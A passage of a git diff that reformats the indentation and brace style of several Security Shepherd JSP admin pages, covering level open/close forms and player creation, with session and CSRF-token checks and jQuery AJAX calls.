-                        if (ajaxCall.status == 200) {
-                            //Now output Result Div and Show
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                            //Refresh the Side Menu
-                            refreshSideMenu(theCsrfToken, theRefreshError);
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                        }
-                        console.log('Showing Form');
-                        $("#submitButton").slideDown("slow");
-                        $('html, body').animate({
-                            scrollTop: $("#resultDiv").offset().top
-                        }, 1000);
-                    });
-                });
-                var theRefreshError = "Could not Refresh Menu";
-            });
-        </script>
-        <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-        <% } %>
-    </div>
+	<h1 class="title">Open and Close Levels</h1>
+	<div class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Use this form to open and close levels by entire categories.
+				Levels that are closed will not appear in any level listings.</p>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<div id="submitButton" align="center">
+				<div>
+					<table>
+						<tr>
+							<td colspan="2"><%= Getter.getOpenCloseCategoryMenu(ApplicationRoot) %>
+							</td>
+						</tr>
+						<tr>
+							<td><input type="submit" value="Close Categories"></td>
+							<td><input type="button" id="openCategories"
+								value="Open Categories"></td>
+						</tr>
+					</table>
+				</div>
+			</div>
+		</form>
+		<br>
+		<div id="resultDiv" style="display: none;" class="informationBox"></div>
+		<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+		<div id="badData"></div>
+		<script>					
+			$("#theForm").submit(function(){
+				//Get Data
+				var toDo = $("#toDo").val();
+				var theCsrfToken = $('#csrfToken').val();
+				
+				//Show and Hide Stuff
+				$("#loadingDiv").show("fast");
+				$("#badData").hide("fast");
+				$("#resultDiv").hide("fast");
+				$("#submitButton").slideUp("fast", function(){
+					//The Ajax Operation
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "openCloseModuleCategories",
+						data: {
+							toOpenOrClose: toDo,
+							openOrClose: "closed",
+							csrfToken: theCsrfToken
+						},
+						async: false
+					});
+					$("#loadingDiv").hide("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							//Now output Result Div and Show
+							$("#resultDiv").html(ajaxCall.responseText);
+							$("#resultDiv").show("fast");
+						}
+						else
+						{
+							$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+							$("#badData").show("slow");
+						}
+						console.log('Showing Form');
+						$("#submitButton").slideDown("slow");
+					});
+				});
+				var theRefreshError = "Could not Refresh Menu";
+				//Refresh the Side Menu
+				refreshSideMenu(theCsrfToken, theRefreshError);
+			});
+			
+			$("#openCategories").click(function(){
+				var toDo = $("#toDo").val();
+				var theCsrfToken = $('#csrfToken').val();
+				//Show and Hide Stuff
+				$("#loadingDiv").show("fast");
+				$("#badData").hide("fast");
+				$("#resultDiv").hide("fast");
+				$("#submitButton").slideUp("fast", function(){
+					//The Ajax Operation
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "openCloseModuleCategories",
+						data: {
+							toOpenOrClose: toDo,
+							openOrClose: "open",
+							csrfToken: theCsrfToken
+						},
+						async: false
+					});
+					$("#loadingDiv").hide("fast", function(){
+						if(ajaxCall.status == 200)
+						{
+							//Now output Result Div and Show
+							$("#resultDiv").html(ajaxCall.responseText);
+							$("#resultDiv").show("fast");
+							//Refresh the Side Menu
+							refreshSideMenu(theCsrfToken, theRefreshError);
+						}
+						else
+						{
+							$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+							$("#badData").show("slow");
+						}
+						console.log('Showing Form');
+						$("#submitButton").slideDown("slow");
+						$('html, body').animate({
+					        scrollTop: $("#resultDiv").offset().top
+					    }, 1000);
+					});
+				});
+				var theRefreshError = "Could not Refresh Menu";
+			});
+			</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+	</div>
 </div>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/setStatus.jsp b/src/main/webapp/admin/moduleManagement/setStatus.jsp
index 9d94b8e67..f0600c4ac 100644
--- a/src/main/webapp/admin/moduleManagement/setStatus.jsp
+++ b/src/main/webapp/admin/moduleManagement/setStatus.jsp
@@ -1,124 +1,136 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setStatus.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setStatus.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setStatus.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setStatus.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <div class="post">
-    <h1 class="title">Open and Close Levels</h1>
-    <div id="formDiv" class="entry">
-        <div id="badData"></div>
-        <form id="theForm" action="javascript:;">
-            <p>Use this form to open and close levels by name. Levels that
-                are closed will not appear in any level listings.</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <div id="formDiv" align="center">
-                <div>
-                    <table>
-                        <%= Getter.getModuleStatusMenu(ApplicationRoot) %>
-                    </table>
-                </div>
-                <div>
-                    <input type="submit" value="Update Module Status"/>
-                </div>
-            </div>
-        </form>
+	<h1 class="title">Open and Close Levels</h1>
+	<div id="formDiv" class="entry">
+		<div id="badData"></div>
+		<form id="theForm" action="javascript:;">
+			<p>Use this form to open and close levels by name. Levels that
+				are closed will not appear in any level listings.</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<div id="formDiv" align="center">
+				<div>
+					<table>
+						<%= Getter.getModuleStatusMenu(ApplicationRoot) %>
+					</table>
+				</div>
+				<div>
+					<input type="submit" value="Update Module Status" />
+				</div>
+			</div>
+		</form>
 
-    </div>
-    <br/>
+	</div>
+	<br />
 </div>
 <div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
 <div id="resultDiv" class="informationBox" style="display: none;"></div>
-<script>
-    $("#theForm").submit(function () {
-        var toBeOpened = $("#toOpen").val();
-        var toBeClosed = $("#toClose").val();
-        var theCsrfToken = $('#csrfToken').val();
-        var theModule = $("#theModule").val();
-        //The Ajax Operation
-        $("#loadingSign").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        $("#formDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "setModuleStatus",
-                data: {
-                    toClose: toBeClosed,
-                    toOpen: toBeOpened,
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                    //Update toOpen and toClose lists before showing again
-                    $("#toClose option:selected").remove().appendTo('#toOpen').removeAttr("selected");
-                    $("#toOpen option:selected").remove().appendTo('#toClose').removeAttr("selected");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                $("#formDiv").slideDown("slow");
-                //Refresh the Side Menu
-                refreshSideMenu(theCsrfToken, theRefreshError);
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+<script>					
+	$("#theForm").submit(function(){
+		var toBeOpened = $("#toOpen").val();
+		var toBeClosed = $("#toClose").val();
+		var theCsrfToken = $('#csrfToken').val();
+		var theModule = $("#theModule").val();
+		//The Ajax Operation
+		$("#loadingSign").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		$("#formDiv").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "setModuleStatus",
+				data: {
+					toClose: toBeClosed,
+					toOpen: toBeOpened,
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingSign").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+					//Update toOpen and toClose lists before showing again
+					$("#toClose option:selected").remove().appendTo('#toOpen').removeAttr("selected");
+					$("#toOpen option:selected").remove().appendTo('#toClose').removeAttr("selected");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				$("#formDiv").slideDown("slow");
+				//Refresh the Side Menu
+				refreshSideMenu(theCsrfToken, theRefreshError);
+			});
+		});
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/addPlayers.jsp b/src/main/webapp/admin/userManagement/addPlayers.jsp
index 617d548bd..d4036144f 100644
--- a/src/main/webapp/admin/userManagement/addPlayers.jsp
+++ b/src/main/webapp/admin/userManagement/addPlayers.jsp
@@ -1,217 +1,245 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(addPlayers.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(addPlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Add Players</h1>
-    <div id="createUserDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the class you would like to add a player to and
-                input the player information for the player you wish to create.</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>
-                            Class<font color="red"><small>* </small></font> :
-                        </p>
-                    </td>
-                    <td><select id="classId">
-                        <option value=""></option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtmlAttribute(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td><p>
-                        Username<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="text" id="userName" value=""/></td>
-                </tr>
-                <tr>
-                    <td><p>
-                        Password<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="password" id="passWord"/></td>
-                </tr>
-                <tr>
-                    <td><p>
-                        Confirm Password<font color="red"><small>* </small></font> :
-                    </p></td>
-                    <td><input type="password" id="passWordConfirm"/></td>
-                </tr>
-                <tr>
-                    <td><p>Email Address:</p></td>
-                    <td><input type="text" id="userAddress" value=""/></td>
-                </tr>
-                <tr>
-                    <td><p>Confirm Address:</p></td>
-                    <td><input type="text" id="userAddressCnf"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Create New Player"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Add Players</h1>
+	<div id="createUserDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the class you would like to add a player to and
+				input the player information for the player you wish to create.</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>
+							Class<font color="red"><small>* </small></font> :
+						</p>
+					</td>
+					<td><select id="classId">
+							<option value=""></option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtmlAttribute(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+								%>
+					</select></td>
+				</tr>
+				<tr>
+					<td><p>
+							Username<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="text" id="userName" value="" /></td>
+				</tr>
+				<tr>
+					<td><p>
+							Password<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="password" id="passWord" /></td>
+				</tr>
+				<tr>
+					<td><p>
+							Confirm Password<font color="red"><small>* </small></font> :
+						</p></td>
+					<td><input type="password" id="passWordConfirm" /></td>
+				</tr>
+				<tr>
+					<td><p>Email Address:</p></td>
+					<td><input type="text" id="userAddress" value="" /></td>
+				</tr>
+				<tr>
+					<td><p>Confirm Address:</p></td>
+					<td><input type="text" id="userAddressCnf" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Create New Player" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#theForm").submit(function () {
-        //Get Data
-        var theClass = $("#classId").val();
-        var theUserName = $("#userName").attr('value');
-        var thePassWord = $('#passWord').attr('value');
-        var thePassWordConfirm = $('#passWordConfirm').attr('value');
-        var theUserAddress = $('#userAddress').attr('value');
-        var theUserAddressCnf = $('#userAddressCnf').attr('value');
-        var theCsrfToken = $('#csrfToken').attr('value');
-        //Validation
-        if (theUserName.length == 0 ||
-            thePassWord.length == 0 ||
-            thePassWordConfirm.length == 0) {
-            $('#badData').html("<p><strong><font color='red'>All required fields must be populated </font></strong></p>");
-        } else if (theUserName.length < 5 || theUserName.lenght > 32) {
-            $('#userName').val("");
-            $('#userName').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid Username. Please try Again.</font></strong></p>");
-        } else if (thePassWord.lenght < 5 || thePassWord.lenght > 512) {
-            $('#passWord').val("");
-            $('#passWordConfirm').val("");
-            $('#passWord').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Invalid password. Please try Again.</font></strong></p>");
-        } else if (thePassWord != thePassWordConfirm) {
-            $('#passWord').val("");
-            $('#passWordConfirm').val("");
-            $('#passWord').css("background", "#E42217");
-            $('#passWordConfirm').css("background", "#E42217");
-            $('#badData').html("<p><strong><font color='red'>Password fields did not match. Please try Again.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#createUserDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "addPlayer",
-                    data: {
-                        classId: theClass,
-                        userName: theUserName,
-                        passWord: thePassWord,
-                        passWordConfirm: thePassWordConfirm,
-                        userAddress: theUserAddress,
-                        userAddressCnf: theUserAddressCnf,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Reset Form
-                        $("#userName").val('');
-                        $('#passWord').val('');
-                        $('#passWordConfirm').val('');
-                        $('#userAddress').val('');
-                        $('#userAddressCnf').val('');
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#createUserDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#theForm").submit(function(){
+		//Get Data
+		var theClass = $("#classId").val();
+		var theUserName = $("#userName").attr('value');
+		var thePassWord = $('#passWord').attr('value');
+		var thePassWordConfirm = $('#passWordConfirm').attr('value');
+		var theUserAddress = $('#userAddress').attr('value');
+		var theUserAddressCnf = $('#userAddressCnf').attr('value');
+		var theCsrfToken = $('#csrfToken').attr('value');
+		//Validation
+		if (theUserName.length == 0 ||
+			thePassWord.length == 0 ||
+			thePassWordConfirm.length == 0)
+		{
+			$('#badData').html("<p><strong><font color='red'>All required fields must be populated </font></strong></p>");
+		}
+		else if(theUserName.length < 5 || theUserName.lenght > 32)
+		{
+			$('#userName').val("");
+			$('#userName').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid Username. Please try Again.</font></strong></p>");
+		}
+		else if(thePassWord.lenght < 5 || thePassWord.lenght > 512 )
+		{
+			$('#passWord').val("");
+			$('#passWordConfirm').val("");
+			$('#passWord').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Invalid password. Please try Again.</font></strong></p>");
+		}
+		else if(thePassWord != thePassWordConfirm)
+		{
+			$('#passWord').val("");
+			$('#passWordConfirm').val("");
+			$('#passWord').css("background", "#E42217");
+			$('#passWordConfirm').css("background", "#E42217");
+			$('#badData').html("<p><strong><font color='red'>Password fields did not match. Please try Again.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#createUserDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "addPlayer",
+					data: {
+						classId: theClass,
+						userName: theUserName, 
+						passWord: thePassWord, 
+						passWordConfirm: thePassWordConfirm,
+						userAddress: theUserAddress,
+						userAddressCnf: theUserAddressCnf,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Reset Form
+						$("#userName").val('');
+						$('#passWord').val('');
+						$('#passWordConfirm').val('');
+						$('#userAddress').val('');
+						$('#userAddressCnf').val('');
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#createUserDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/assignPlayers.jsp b/src/main/webapp/admin/userManagement/assignPlayers.jsp
index 9fae05108..467a65df0 100644
--- a/src/main/webapp/admin/userManagement/assignPlayers.jsp
+++ b/src/main/webapp/admin/userManagement/assignPlayers.jsp
@@ -1,234 +1,268 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: assignPlayers.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: assignPlayers.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(assignPlayers.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(assignPlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
